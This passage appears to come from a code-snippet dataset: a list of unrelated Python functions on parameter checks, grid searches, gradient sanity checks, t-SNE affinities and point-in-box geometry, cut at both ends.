\\\n _check_parameter(h, i, j, p[h, i, j],\n integral=integral,\n name=name, sym=sym)", "def check_data_validity(X, y, query, task):\n # ADD IMPLEMENTATION HERE", "def check_assignment(assignments: dict, point: Point, value: str) -> bool:\n\n # check base condition: do the constraints hold for current point\n if not check_constraint_satisfied(assignments, point, value):\n print(' → base constraint failed:', point, '=', value)\n return False\n\n # check neighbouring conditions: do the constraints (still) hold for other points\n temp_assignment = copy.deepcopy(assignments)\n temp_assignment[point] = value\n\n # loop through points that can attack the current point, as kings\n print(' > checking neighbouring kings')\n for pt in filter(lambda p: p in assignments and assignments[p] == 'king', attack_points_king[point]):\n if not check_constraint_satisfied(temp_assignment, pt, assignments[pt]):\n print(' → neighbouring constraint failed for neighbour', pt, '=', assignments[pt])\n return False\n\n # loop through points that can attack the current point, as knights\n print(' > checking neighbouring knights')\n for pt in filter(lambda p: p in assignments and assignments[p] == 'knight', attack_points_knight[point]):\n if not check_constraint_satisfied(temp_assignment, pt, assignments[pt]):\n print(' → neighbouring constraint failed for neighbour', pt, '=', assignments[pt])\n return False\n\n # all constraints are satisfied!\n return True", "def semi_plan_check(coords_list, normal_plane, point_on_plane, tol=1e-8):\n center_to_coords = coords_list - \\\n np.repeat(point_on_plane.reshape((-1,3)), len(coords_list), axis=0)\n normal_plane = \\\n np.repeat(normal_plane.reshape((-1,3)), len(coords_list), axis=0)\n inner_product = np.sum(center_to_coords*normal_plane,axis=1)\n flag = np.zeros(inner_product.shape, dtype=bool)\n flag[inner_product >= 0] = True\n return flag", "def sanity_check():\n print(\"Running sanity check...\")\n\n N = 20\n dimensions = [10, 5, 10]\n data = np.random.randn(N, dimensions[0]) # each row will be a datum\n labels = np.zeros((N, dimensions[2]))\n for i in range(N):\n labels[i,random.randint(0,dimensions[2]-1)] = 1\n \n params = np.random.randn((dimensions[0] + 1) * dimensions[1] + (\n dimensions[1] + 1) * dimensions[2], )\n\n gradcheck_naive(lambda params: forward_backward_prop(data, labels, params,\n dimensions), params)", "def para_search(dname):\n if sys.platform != 'win32':\n grid_py = './PromoterSVM/libsvm/tools/grid.py'\n # gnuplot_exe = '/usr/bin/gnuplot'\n # svmtrain_exe = '../my-svm-train'\n else:\n grid_py = r'D:\\LiYuan\\\"Bioinformatic Research\"\\IMU\\zuo\\Tasks\\\"20160206-Promoter SVM\"\\biopromoter_script\\PromoterSVM\\libsvm\\tools\\grid.py'\n # gnuplot_exe = r\"D:\\Program Files\\gnuplot\\bin\\gnuplot.exe\"\n # svmtrain_exe = r'D:\\LiYuan\\\"Bioinformatic Research\"\\IMU\\zuo\\Tasks\\\"20160206-Promoter SVM\"\\biopromoter_script\\PromoterSVM\\libsvm\\windows\\my-svm-train.exe'\n\n ###################################\n # grid.py: find the best parameter(c,g), and generates a model file\n ###################################\n # cg_results = []\n cmd = \"{0} {1}\".format(grid_py, dname)\n print \"Cross Validating...\"\n grid_out = Popen(cmd, shell=True, stdout=PIPE).stdout\n\n print cmd\n print grid_out.readline()\n\n line = \"\"\n while True:\n last_line = line\n line = grid_out.readline()\n if not line:\n break\n c, g, cvrate = map(float, last_line.split())\n # cg_results.append('Best c={0}, g={1} CV rate={2}'.format(c,g,rate))\n\n print('Best c={0}, g={1} CV 
rate={2}'.format(c, g, cvrate))\n\n return c, g, cvrate", "def points_in_boxes_gpu(points, boxes):\n assert boxes.shape[0] == points.shape[0]\n assert boxes.shape[2] == 7\n batch_size, num_points, _ = points.shape\n\n box_idxs_of_pts = points.new_zeros((batch_size, num_points),\n dtype=torch.int).fill_(-1)\n roiaware_pool3d_ext.points_in_boxes_gpu(boxes.contiguous(),\n points.contiguous(),\n box_idxs_of_pts)\n\n return box_idxs_of_pts", "def check(self):\r\n self.check_probabilities()\r\n self.check_sum()", "def run(self):\n\t\tcurX = self.x0\n\t\tcurY = self.func.evalAt(curX)\n\t\tcurT = self.T0\n\t\tfor i in range(1, self.iters + 1):\n\t\t\tif curT == 0:\n\t\t\t\tbreak\n\t\t\tnX = self.newStateFunc(curX)\n\t\t\tnY = self.func.evalAt(nX)\n\t\t\tif nY <= curY or self.acceptanceFunc(nY - curY, curT) > random.random(): # accept if lower energy or probability check passes\n\t\t\t\tcurX = nX\n\t\t\t\tcurY = nY \n\t\t\tcurT = self.coolingFunc(self.T0, i)\t\n\t\treturn (curX, curY)", "def isparallel(p1, p2, tol=10*_eps):\n \n return np.linalg.norm(np.cross(p1.w, p2.w) ) < tol", "def cloudranger_param_search(ela, alpha, entry_point, true_root_cause, data_inwindow, data_head,\n dep_graph, window_start):\n result_list = []\n for beta in np.arange(0.1, 1.0, 0.2):\n for rho in np.arange(0.1, 1.0, 0.2):\n tic = time.time()\n prks, acc = test_cloud_ranger(\n data_source=\"ibm_micro_service\",\n pc_aggregate=ela,\n pc_alpha=alpha,\n testrun_round=5,\n beta=beta,\n rho=rho,\n frontend=entry_point,\n true_root_cause=true_root_cause,\n verbose=0,\n runtime_debug=False,\n data=data_inwindow,\n data_head=data_head,\n disable_print=True,\n dep_graph=dep_graph,\n window_start=window_start\n )\n toc = time.time()-tic\n result_list.append({\n 'ela': ela,\n 'beta': beta,\n 'rho': rho,\n 'time': toc,\n 'prks': prks,\n 'acc': acc\n })\n print(\"Cloudranger ela:{:d} beta:{:.2f} rho:{:.2f} time:{:.4f} acc:{:.4f}\".format(\n ela, beta, rho, toc, acc))\n return result_list", "def runIteration(self, task, Sol, Fitness, xb, fxb, A, S, Q, v, **dparams):\n\t\tfor i in range(self.NP):\n\t\t\tQ[i] = self.Qmin + (self.Qmax - self.Qmin) * self.uniform(0, 1)\n\t\t\tv[i] += (Sol[i] - xb) * Q[i]\n\t\t\tif self.rand() > self.r: S[i] = self.localSearch(best=xb, A=A[i], task=task, i=i, Sol=Sol)\n\t\t\telse: S[i] = task.repair(Sol[i] + v[i], rnd=self.Rand)\n\t\t\tFnew = task.eval(S[i])\n\t\t\tif (Fnew <= Fitness[i]) and (self.rand() < A[i]): Sol[i], Fitness[i] = S[i], Fnew\n\t\t\tif Fnew <= fxb: xb, fxb, A[i] = S[i].copy(), Fnew, self.updateLoudness(A[i])\n\t\treturn Sol, Fitness, xb, fxb, {'A': A, 'S': S, 'Q': Q, 'v': v}", "def sanity_check():\n print \"Running sanity check...\"\n\n N = 20\n dimensions = [10, 5, 10]\n data = np.random.randn(N, dimensions[0]) # each row will be a datum\n labels = np.zeros((N, dimensions[2]))\n for i in xrange(N):\n labels[i,random.randint(0,dimensions[2]-1)] = 1\n \n params = np.random.randn((dimensions[0] + 1) * dimensions[1] + (\n dimensions[1] + 1) * dimensions[2], )\n\n gradcheck_naive(lambda params: forward_backward_prop(data, labels, params,\n dimensions), params)", "def _evaluate_centroids(self):\n\n for c in self.centroids:\n _prev_cent = self._prev_centroids[c]\n _curr_cent = self.centroids[c]\n\n if self._euclidean_distance(_prev_cent, _curr_cent) > self.tol:\n return\n self._optimized = True", "def point_valid(self, pt, samples):\n\n\t cell_coords = self.get_cell_coords(pt)\n\t for idx in self.get_neighbours(cell_coords):\n\t nearby_pt = samples[idx]\n\t # Squared distance between or 
candidate point, pt, and this nearby_pt.\n\t distance2 = (nearby_pt[0]-pt[0])**2 + (nearby_pt[1]-pt[1])**2\n\t if distance2 < (self.r)**2:\n\t # The points are too close, so pt is not a candidate.\n\t return False\n\t # All points tested: if we're here, pt is valid\n\t return True", "def points_in_boxes_cpu(points, boxes):\n # TODO: Refactor this function as a CPU version of points_in_boxes_gpu\n assert boxes.shape[1] == 7\n assert points.shape[1] == 3\n\n point_indices = points.new_zeros((boxes.shape[0], points.shape[0]),\n dtype=torch.int)\n roiaware_pool3d_ext.points_in_boxes_cpu(boxes.float().contiguous(),\n points.float().contiguous(),\n point_indices)\n\n return point_indices", "def sanity_check():\n print \"Running sanity check...\"\n\n N = 20\n dimensions = [10, 5, 10]\n data = np.random.randn(N, dimensions[0]) # each row will be a datum\n labels = np.zeros((N, dimensions[2]))\n for i in xrange(N):\n labels[i, random.randint(0,dimensions[2]-1)] = 1\n\n params = np.random.randn((dimensions[0] + 1) * dimensions[1] + (\n dimensions[1] + 1) * dimensions[2], )\n\n forward_backward_prop(data, labels, params, dimensions)\n\n gradcheck_naive(lambda params:\n forward_backward_prop(data, labels, params, dimensions), params)", "def learn_params(self, measurements, true_ranges):\n z_hit,z_short,z_max,z_rand,var_hit,lambda_short= self.params\n pre_params=[z_hit,z_short,z_max,z_rand,var_hit,lambda_short]\n updated_params=[-1,-1,-1,-1,-1,-1]\n while np.max(np.abs(np.array(updated_params) - np.array(pre_params))) > 1e-6:\n\n e_hit, e_short, e_max, e_rand = [], [], [], []\n for i in range(len(measurements)):\n true_range, measurement = true_ranges[i], measurements[i]\n p_hit = self.PHit(true_range, measurement,var_hit)\n p_short = self.PShort(true_range, measurement,lambda_short)\n p_max = self.PMax(measurement)\n p_rand = self.PRand(measurement)\n normalizer = 1.0 / (p_hit + p_short + p_max + p_rand)\n e_hit.append(normalizer * p_hit)\n e_short.append(normalizer * p_short)\n e_max.append(normalizer * p_max)\n e_rand.append(normalizer * p_rand)\n e_hit, e_short, e_max, e_rand = np.array(e_hit), np.array(e_short), np.array(e_max), np.array(e_rand)\n\n # perform M step\n pre_params = [z_hit, z_short, z_max, z_rand, var_hit,lambda_short]\n z_hit = sum(e_hit) / len(measurements)\n z_short = sum(e_short) / len(measurements)\n z_max = sum(e_max)/ len(measurements)\n z_rand = sum(e_rand) / len(measurements)\n var_hit = np.sqrt(1.0 / np.sum(e_hit) * np.sum(e_hit * (np.array(measurements)-np.array(true_ranges))**2)).item()\n lambda_short = (np.sum(e_short) / np.sum(e_short * np.array(measurements))).item()\n updated_params = [z_hit, z_short, z_max, z_rand, var_hit, lambda_short]\n print('origin',self.params)\n print('updated',updated_params)\n return updated_params", "def checkLists(self):\n self.x = self.checkList(self.x)\n self.y = self.checkList(self.y)\n return", "def check_consistent_params(self, X, y):\n y = self.check_consistent_y(y)\n X = self.check_consistent_X(X)\n\n return X, y", "def x2p(X = Math.array([]), tol = 1e-5, perplexity = 30.0):\n\n # Initialize some variables\n print \"Computing pairwise distances...\"\n (n, d) = X.shape;\n sum_X = Math.sum(Math.square(X), 1);\n D = Math.add(Math.add(-2 * Math.dot(X, X.T), sum_X).T, sum_X);\n P = Math.zeros((n, n));\n beta = Math.ones((n, 1));\n logU = Math.log(perplexity);\n\n # Loop over all datapoints\n for i in range(n):\n \n # Print progress\n if i % 500 == 0:\n print \"Computing P-values for point \", i, \" of \", n, \"...\"\n \n # Compute the 
Gaussian kernel and entropy for the current precision\n betamin = -Math.inf; \n betamax = Math.inf;\n Di = D[i, Math.concatenate((Math.r_[0:i], Math.r_[i+1:n]))];\n (H, thisP) = Hbeta(Di, beta[i]);\n \n # Evaluate whether the perplexity is within tolerance\n Hdiff = H - logU;\n tries = 0;\n while Math.abs(Hdiff) > tol and tries < 50:\n \n # If not, increase or decrease precision\n if Hdiff > 0:\n betamin = beta[i];\n if betamax == Math.inf or betamax == -Math.inf:\n beta[i] = beta[i] * 2;\n else:\n beta[i] = (beta[i] + betamax) / 2;\n else:\n betamax = beta[i];\n if betamin == Math.inf or betamin == -Math.inf:\n beta[i] = beta[i] / 2;\n else:\n beta[i] = (beta[i] + betamin) / 2;\n \n # Recompute the values\n (H, thisP) = Hbeta(Di, beta[i]);\n Hdiff = H - logU;\n tries = tries + 1;\n \n # Set the final row of P\n P[i, Math.concatenate((Math.r_[0:i], Math.r_[i+1:n]))] = thisP;\n \n # Return final P-matrix\n print \"Mean value of sigma: \", Math.mean(Math.sqrt(1 / beta))\n return P;", "def _compute_parameters(self, p, k):\n for i in range(self._.d + 1):\n p[0, i, i] = k[i]\n p[i, 0, i] = Integer(1)\n p[i, i, 0] = Integer(1)\n for i in range(self._.d):\n p[i+1, 1, i+1] = self._.a[i+1]\n p[i, 1, i+1] = self._.b[i]\n p[i+1, 1, i] = self._.c[i+1]\n for i in range(2, self._.d + 1):\n for j in range(1, self._.d + 1):\n for h in range(1, self._.d):\n p[h, i, j] = self._check_parameter(\n h, i, j,\n _simplify(_expand((\n self._.c[h] * p[h-1, i-1, j]\n + self._.b[h] * p[h+1, i-1, j]\n - self._.b[i-2] * p[h, i-2, j]\n + (self._.a[h] - self._.a[i-1]) * p[h, i-1, j]\n ) / self._.c[i])))\n p[self._.d, i, j] = self._check_parameter(\n self._.d, i, j,\n _simplify(_expand((\n self._.c[self._.d] * p[self._.d-1, i-1, j]\n - self._.b[i-2] * p[self._.d, i-2, j]\n + (self._.a[self._.d] - self._.a[i-1])\n * p[self._.d, i-1, j]\n ) / self._.c[i])))", "def __evaluateLocal__(self,featureVals):\n returnEvaluation = {self.pivotParameterID:self.pivotValues}\n for target in list(set(self.target) - set([self.pivotParameterID])):\n reconstructData = self._reconstructData(target).real\n # find the nearest data and compute weights\n if len(reconstructData) > 1:\n weights, indexes = self.KDTreeFinder.query(featureVals, k=min(2**len(self.features),len(reconstructData)))\n # if 0 (perfect match), assign minimum possible distance\n weights[weights == 0] = sys.float_info.min\n weights =1./weights\n # normalize to 1\n weights = weights/weights.sum()\n for point in range(len(weights)):\n returnEvaluation[target] = np.sum ((weights[point,:]*reconstructData[indexes[point,:]].T) , axis=1)\n else:\n returnEvaluation[target] = reconstructData[0]\n\n return returnEvaluation", "def get_triple_point_distances(self) -> Dict[str, List[Any]]:\n relevant_distances = {}\n for read_meth in self.readout_methods:\n f_params = self.fit_parameters[read_meth]\n binary_neighborhood = f_params[\"binary_neighborhood\"]\n noise_level = f_params[\"noise_level\"]\n distance_threshold = f_params[\"distance_threshold\"]\n\n data = self.filtered_data[read_meth]\n signal = data.values.T\n v_x = data[default_coord_names[\"voltage\"][0]].values\n v_y = data[default_coord_names[\"voltage\"][1]].values\n\n neighborhood = generate_binary_structure(2, binary_neighborhood)\n m_filter = maximum_filter(signal, footprint=neighborhood)\n detected_peaks = m_filter == signal\n\n background = signal <= noise_level\n eroded_background = binary_erosion(\n background, structure=neighborhood, border_value=1\n )\n\n detected_peaks[eroded_background == True] = False\n\n 
labeled_features = scm.label(detected_peaks)\n labels = labeled_features[0]\n n_features = labeled_features[1]\n if np.sum(n_features) > 1:\n coordinates = []\n\n for peak_id in range(1, n_features + 1):\n indx = np.argwhere(labels == peak_id)[0]\n if len(indx) == 0:\n logger.error(\"No peak found.\")\n\n if (\n indx[1] > 0\n and indx[1] < len(v_x) - 2\n and indx[0] > 0\n and indx[0] < len(v_y) - 2\n ):\n x_val = v_x[indx[1]]\n y_val = v_y[indx[0]]\n coordinates.append([x_val, y_val])\n coordinates = np.array(coordinates)\n\n # calculate distances between points, all to all\n all_combos = combinations(coordinates, 2)\n distances = [get_point_distances(*combo) for combo in all_combos]\n distances_arr = np.asarray(distances)\n relevant_indx = np.where(distances_arr[:, 0, 0] <= distance_threshold)[\n 0\n ]\n\n dist_list = [distances[indx] for indx in relevant_indx]\n relevant_distances[read_meth] = dist_list\n else:\n relevant_distances[read_meth] = []\n return relevant_distances", "def testPointSystem():\n deleteMatches()\n deletePlayers()\n registerPlayer(\"Pikachu\")\n registerPlayer(\"Charmander\")\n registerPlayer(\"Bulbasaur\")\n registerPlayer(\"Squirtle\")\n registerPlayer(\"MewTwo\")\n standings = playerStandings()\n [id1, id2, id3, id4, id5] = [row[0] for row in standings]\n reportMatch(id1, id2)\n reportMatch(id3, id4, True)\n reportMatch(id5, id5, False, True)\n reportMatch(id1, id5)\n reportMatch(id3, id4)\n reportMatch(id2, id2, False, True)\n reportMatch(id1, id3)\n reportMatch(id5, id2)\n reportMatch(id4, id4, False, True)\n standings = playerStandings()\n if not (standings[0][0]==id2 and standings[0][2]==2 and\n standings[1][0]==id4 and standings[0][2]==2 and\n standings[2][0]==id3 and standings[0][2]==2 and\n standings[3][0]==id5 and standings[0][2]==2 and\n standings[4][0]==id1 and standings[0][2]==2):\n raise ValueError(\n \"Points are not tallied correctly.\"\n )\n\n print \"4. Points are tallied correctly.\"", "def perform_parameter_checks(self, update=False):\n for p, check_function in self.parameter_checks.items():\n try:\n val = p.snapshot(update=update)['value']\n res = check_function(val)\n if res != True: # False or a string (error message)\n log.warning(\n f'Parameter {p.full_name} has an uncommon value: '\n f'{val}.' 
+ (f\" ({res})\" if res is not False else ''))\n except Exception as e:\n log.warning(\n f'Could not run parameter check for {p}: {e}')", "def gridSearch(xTrain, yTrain, xTest, yTest, model, modelParameters, hyperParameters, \n nFolds = 1, reTrain = True, plotGraphs = False):\n leastLoss = None\n bestModel = None\n bestHyperParams = None\n \n \"\"\"Generate the parameter grid\"\"\"\n parameterGrid = []\n gridKeys = []\n \n parameterGrid = list(product(*hyperParameters.values()))\n hyperParameterKeys = hyperParameters.keys()\n \n \"\"\"For plottong graphs\"\"\"\n if plotGraphs:\n plt.close()\n plotHeight = 10\n plotWidth = 20\n index = 0\n fig, axs = plt.subplots(len(parameterGrid), 2, figsize=(plotWidth, plotHeight * len(parameterGrid)))\n fig = plt.figure()\n fig.set_figheight(15)\n fig.set_figwidth(15)\n ax = fig.add_subplot(111, projection='3d')\n \n\n \"\"\"Grid search for cartesian product of hyperParameters\"\"\" \n for parameterMesh in parameterGrid:\n hyperParameterMesh = {}\n for k,v in zip(hyperParameterKeys, parameterMesh):\n hyperParameterMesh[k] = v\n \n \"\"\"Combine model Parameters\"\"\"\n updatedParam = modelParameters.copy()\n updatedParam.update(hyperParameterMesh)\n \n \"\"\"Perform grid search with cross validation\"\"\"\n if nFolds > 1:\n modelParams, trainLossList, testLossList, analysisMetricList = kFoldAnalysis(model = model,\n xTrain = xTrain,\n yTrain = yTrain,\n nFolds = nFolds,\n modelParameters = updatedParam) \n \n \n \"\"\"For storing best model\"\"\"\n avg = np.average(analysisMetricList)\n if leastLoss == None or avg < leastLoss:\n leastLoss = avg\n bestModel = modelParams\n bestHyperParams = hyperParameterMesh\n \n \"\"\"For plotting\"\"\"\n if plotGraphs:\n foldIndex = 1\n\n ax.scatter(hyperParameterMesh['alpha'], hyperParameterMesh['regularizationParameter'], \n avg, marker = 'o', label = str(hyperParameterMesh))\n \n\n for train, test in zip(trainLossList, testLossList):\n axs[index][0].plot(train, label = \"Fold-\" + str(foldIndex))\n axs[index][1].plot(test, label = \"Fold-\" + str(foldIndex))\n foldIndex = foldIndex + 1\n \n axs[index][0].legend()\n axs[index][0].grid()\n \n axs[index][1].legend()\n axs[index][1].grid()\n \n axs[index][0].set_title(\"Train set for \" + str(hyperParameterMesh))\n axs[index][1].set_title(\"Validation set for \" + str(hyperParameterMesh))\n \n index = index + 1\n \n \n \"\"\"Perform only grid search and no cross validation. 
Test set will be used for validation\"\"\" \n else:\n trainedModel, trainLoss, testLoss = model(xTrain, yTrain, xTest, yTest, **updatedParam)\n \n \"\"\"For storing best model\"\"\"\n if leastLoss == None or testLoss[-1] < leastLoss:\n leastLoss = testLoss[-1]\n bestModel = trainedModel\n bestHyperParams = hyperParameterMesh\n \n \"\"\"For plotting graphs\"\"\"\n if plotGraphs:\n axs[index][0].plot(trainLoss, label = \"Training set Loss for \" + str(hyperParameterMesh))\n axs[index][0].legend()\n axs[index][0].grid()\n axs[index][1].plot(testLoss, label = \"Test set Loss for \" + str(hyperParameterMesh))\n axs[index][1].legend()\n axs[index][1].grid()\n index = index + 1\n \n if plotGraphs:\n ax.legend()\n ax.set_xlabel('alpha')\n ax.set_ylabel('regularizationParameter')\n ax.set_zlabel('RMSE')\n\n plt.show()\n plt.close()\n \n if reTrain:\n \n \"\"\"Combine model Parameters\"\"\"\n updatedParam = modelParameters.copy()\n updatedParam.update(bestHyperParams)\n\n bestModel, trainLoss, testLoss = model(xTrain, yTrain, xTest, yTest, **updatedParam)\n print trainLoss[-1]\n print testLoss[-1]\n \n if plotGraphs:\n plt.close()\n plotHeight = 10\n plotWidth = 20\n fig, axs = plt.subplots(1, 2, figsize = (plotWidth, plotHeight)) \n \n plt.suptitle(\"Best model\")\n\n axs[0].plot(trainLoss, label = \"Training set Loss for \" + str(bestHyperParams))\n axs[0].legend()\n axs[0].grid()\n axs[1].plot(testLoss, label = \"Test set Loss for \" + str(bestHyperParams))\n axs[1].legend()\n axs[1].grid()\n \n plt.show()\n \n \n \n return bestModel, bestHyperParams", "def gridsearch_LCPS(y, w, splits_list, grid=None, t=1):\n # repeat loop for every parameter in grid\n average_mae_per_par = dict()\n for parameter in grid:\n\n mae_list = []\n\n # for loop for each set of indices per fold\n for index_dict in splits_list:\n # perform rolling predictions using train set on the validation set\n y_pred = rolling_pred_LCPS(LCPSModel,\n y[index_dict[\"train\"][0]:\n index_dict[\"train\"][1]],\n y[index_dict[\"validation\"][0]:\n index_dict[\"validation\"][1]],\n w[index_dict[\"train\"][0]:\n index_dict[\"train\"][1]],\n w[index_dict[\"validation\"][0]:\n index_dict[\"validation\"][1]],\n t=t, gamma=parameter)\n\n # add the mean absolute error on validation set to the list\n mae_list.append(mean_absolute_error(\n np.exp(y[\n index_dict[\"validation\"][0]:\n index_dict[\"validation\"][1]]),\n np.exp(y_pred)))\n\n # add average mae for parameter to dict\n average_mae_per_par[\"{}\".format(parameter)] = np.mean(mae_list)\n\n # return parameter with average mae\n\n return min(average_mae_per_par, key=average_mae_per_par.get), \\\n average_mae_per_par", "def iterative_function_vect(points, numLines, numIter, e_tilde, gamma_tilde, beta_tilde):\n \n numPoints = len(points)\n \n # Randomly sample pairs and get the corresponding rho and theta parameters for a line fitted to the pair: \n # Returns a list of tuples - Each tuple has the rho and theta parameters for the line: \n lines ,idxs = info_rand_sample_fit_lines(points, numLines)\n \n \n # Compute normal distance of each point from each line: Store in a 2-D numpy array: \n # Points along 1st axis - Rows - axis= 0\n # Lines along 2nd axis - Columns - axis=1\n \n # Initialize the 2-D array: \n normDist = np.zeros((numPoints, numLines))\n \n \n # Indices for the 2-D array: \n j,k = 0,0\n \n # Loop through points:\n for point in points: \n \n k = 0\n \n # Loop through the lines: \n for line in lines:\n \n normDist[j,k] = get_normal_dist(line,point)\n \n # Increment the column 
(line) index:\n k+=1\n \n \n #Increment the row (point) index\n j += 1\n \n # Transform the Normal Distance matrix to the Probability of Membership matrix: \n Pr_C = log_dec(normDist,e_tilde)\n \n \n ## Iteratively refine estimates of Prob of Validity - Points and Lines: \n iterCount = 0\n \n # Initialize Probability of Validity of points and lines: \n initProb =1\n Pr_A = initProb*np.ones((numPoints,1))\n Pr_V = np.zeros((numLines,1))\n \n \n # Initialize gamma and beta: Fractions of valid points and lines respectively: \n gamma = np.zeros_like(Pr_V)\n beta = np.zeros_like(Pr_A)\n \n \n while iterCount < numIter: \n \n # For each line: Compute Gamma:\n \n # Compute expected fraction of valid points: \n gamma = np.dot(Pr_A.T, Pr_C)/np.sum(Pr_A) # Hope the broadcasting works here:\n \n \n # Compute Probability of Validity: \n Pr_V = log_inc(gamma, gamma_tilde) \n \n \n # For each point: Compute beta:\n \n # Compute expected fraction of valid lines in which it is a member: \n beta = np.dot(Pr_C, Pr_V.T)/np.sum(Pr_V)\n \n \n # Compute Probability of Validity: \n Pr_A = log_inc(beta, beta_tilde)\n \n \n iterCount +=1\n \n # Sort the lines according to Probability of Validity:\n idx_sort = np.argsort(Pr_V, axis=1)\n \n print (\" The equations of candidate lines and their probability of validity are: \") \n\n \n for idx in idx_sort: \n print (lines[int(idx)] , end = '-- >')\n print (Pr_V[idx])\n \n return lines, Pr_A, Pr_V", "def check_point_update(self):\n self.cp_count += 1\n\n if len(self.cases) > self.nyquist:\n \"\"\"\n Recalculates nyquist, releases cases and updates model (merges graphs)\n \"\"\"\n self.release_cases_from_memory()\n if self.check_point_cases > 5:\n self.nyquist = self.check_point_cases * 2\n\n check_point_graph = initialize_graph(nx.DiGraph(), self.cases)\n self.process_model_graph = merge_graphs(self.process_model_graph, check_point_graph)\n\n self.check_point_cases = 0", "def _check_deep_network_params(X: np.ndarray, y: np.ndarray):\n pass", "def part_one(test_data, train_data):\n print \"Part 1.1\"\n range_k = range(1,71, 2)\n train_acc = []\n test_acc = []\n cv_acc = []\n train_neighbors_dists = knn_algo(train_data, train_data)\n test_neighbors_dists = knn_algo(test_data, train_data)\n cv_dists = knn_algo_cross_validate(train_data)\n\n for k in range_k:\n train_neighbors = find_k(train_neighbors_dists, k)\n train_err = (calculate_error(train_neighbors))\n\n test_neighbors = find_k(test_neighbors_dists, k)\n test_err = (calculate_error(test_neighbors))\n\n cv_neighbors = find_k(cv_dists, k)\n cv_err = (calculate_error(cv_neighbors))\n\n ### TODO: cross validation here\n train_acc.append(train_err)\n test_acc.append(test_err)\n cv_acc.append(cv_err)\n\n # part 1.1\n print \"K range: \"\n print range_k\n print \"Train acc: \"\n print train_acc\n print \"Test acc: \"\n print test_acc\n print \"CV acc: \"\n print cv_acc\n\n print \"Part 1.2: \"\n # part 1.2\n plt.plot(range_k, train_acc, label = \"train\")\n plt.plot(range_k, test_acc, label = \"test\")\n plt.plot(range_k, cv_acc, label = \"CV\")\n plt.ylabel(\"percent error\")\n plt.xlabel(\"k\")\n plt.legend()\n plt.show()\n return (range_k, train_acc, test_acc, cv_acc)", "def test_penalty_compute(self):\n objective = {'G': numpy.zeros((9)),\n 'H': numpy.diag((1,)*9),\n 'X': 1}\n for penalty in self.penalties:\n result = penalty.compute([1]*self.np, objective)\n assert isinstance(result,tuple)\n # more tests go here", "def _check_run(self, axis):\n if (self.x_traj, self.y_traj)[axis] is None:\n if (self.inverse_x_traj, 
self.inverse_y_traj)[axis] is None:\n raise Exception('The algorithm has not been run.')\n else:\n if self.params['print_info']:\n print('Warning: you are using the opposite score. It can contain errors if any score is a zero below threshold.')\n return (self.inverse_x_traj, self.inverse_y_traj)[axis], (self.inverse_x_ranking, self.inverse_y_ranking)[axis]\n return (self.x_traj, self.y_traj)[axis], (self.x_ranking, self.y_ranking)[axis]", "def par_test_2(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n\n res = [\n self.XYZ_factor.mult(self.scalar),\n self.XYZ_factor.mult(self.scalarf),\n self.scalarf.mult(self.XYZ_factor),\n ]\n\n par_res = [\n self.XYZ_par_factor.mult(self.scalar),\n self.XYZ_par_factor.mult(self.par_scalarf),\n self.par_scalarf.mult(self.XYZ_par_factor),\n ]\n\n for i, ele in enumerate(res):\n assert (\n ele.rand_vars == par_res[i].rand_vars\n and ele.values == par_res[i].values\n )", "def test_check_point():\n board = Board(640, 640, 8)\n board.start_game()\n assert board.check_point(board.SPACE_SIZE/2, board.SPACE_SIZE/2) is not None\n assert board.check_point(0, 0) is None", "def _para_fit(self, X):\n data = self.convert_input(X)\n # This is just a cheap way to approximate the actual value\n unique_elements = set(data.elements)\n pairs = get_element_pairs(data.elements)\n return unique_elements, pairs", "def _compute_gps_parallel(dataset, number_gp, t_min, t_max, output_root,\n number_processes, gp_dim, **kwargs):\n p = Pool(number_processes, maxtasksperchild=10)\n\n # Pool and map can only really work with single-valued functions\n partial_gp = partial(_compute_gp_all_passbands, dataset=dataset,\n number_gp=number_gp, t_min=t_min, t_max=t_max,\n output_root=output_root, gp_dim=gp_dim, **kwargs)\n\n dataset_gps = p.map(partial_gp, dataset.object_names, chunksize=10)\n p.close()\n\n for i in range(len(dataset.object_names)):\n obj = dataset.object_names[i]\n obj_gps = dataset_gps[i]\n dataset.models[obj] = obj_gps\n print('Models fitted with the Gaussian Processes values.')", "def input_check(self):\n\n if self.species == 'He': assert self.line_model == 'voigt'\n n_upper_range, e_dens_range, temp_range, b_field_range = get_param_ranges(self.line_model)\n\n if np.isnan(n_upper_range).sum() <= 1:\n assert (self.n_upper in range(n_upper_range[0], n_upper_range[1]))\n if np.isnan(e_dens_range).sum() <= 1:\n assert (e_dens_range[0] <= self.e_dens <= e_dens_range[1])\n if np.isnan(temp_range).sum() <= 1:\n assert (temp_range[0] <= self.temp <= temp_range[1])\n if np.isnan(b_field_range).sum() <= 1:\n assert (b_field_range[0] <= self.b_field <= b_field_range[1])", "def checkPointValidity(self, point: Tuple[float, float]) -> bool:\n neighbor = self.kdtree.search_nn(point)\n if not neighbor:\n self.kdtree.add(point)\n return True\n if neighbor[1] <= self.MIN_POINTS_DIST:\n return False\n else:\n self.kdtree.add(point)\n return True", "def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n\n super().check_params(X)", "def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n\n super().check_params(X)", "def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n\n super().check_params(X)", "def _process(self, x: np.ndarray, y: np.ndarray) -> None:\n\n if (((self.support_vectors - x) ** 2).sum(axis=1) ** 0.5 < self.ERR).any():\n return\n\n self._add_support_vectors(x, y)\n\n if y[0] == 1:\n i = self.support_vectors.shape[0] - 1\n j = self._find_min_gradient_id()\n\n else:\n j = 
self.support_vectors.shape[0] - 1\n i = self._find_max_gradient_id()\n\n if not self._is_violating_pair(i, j):\n return\n\n self._update_parameters(i=i, j=j)", "def isinsidepointXY(x,p):\n \n return dist(x,p) < epsilon", "def check_point(point,points):\n if point in points:\n return True\n else:\n return False", "def read_data_split_and_search():\n\n\n\n dataReader = Movielens10MReader()\n dataset = dataReader.load_data()\n\n URM_train, URM_test = split_train_in_two_percentage_global_sample(dataset.get_URM_all(), train_percentage = 0.80)\n URM_train, URM_validation = split_train_in_two_percentage_global_sample(URM_train, train_percentage = 0.80)\n\n output_folder_path = \"result_experiments/\"\n\n\n # If directory does not exist, create\n if not os.path.exists(output_folder_path):\n os.makedirs(output_folder_path)\n\n\n\n\n\n\n\n collaborative_algorithm_list = [\n Random,\n TopPop,\n P3alphaRecommender,\n RP3betaRecommender,\n ItemKNNCFRecommender,\n UserKNNCFRecommender,\n MatrixFactorization_BPR_Cython,\n 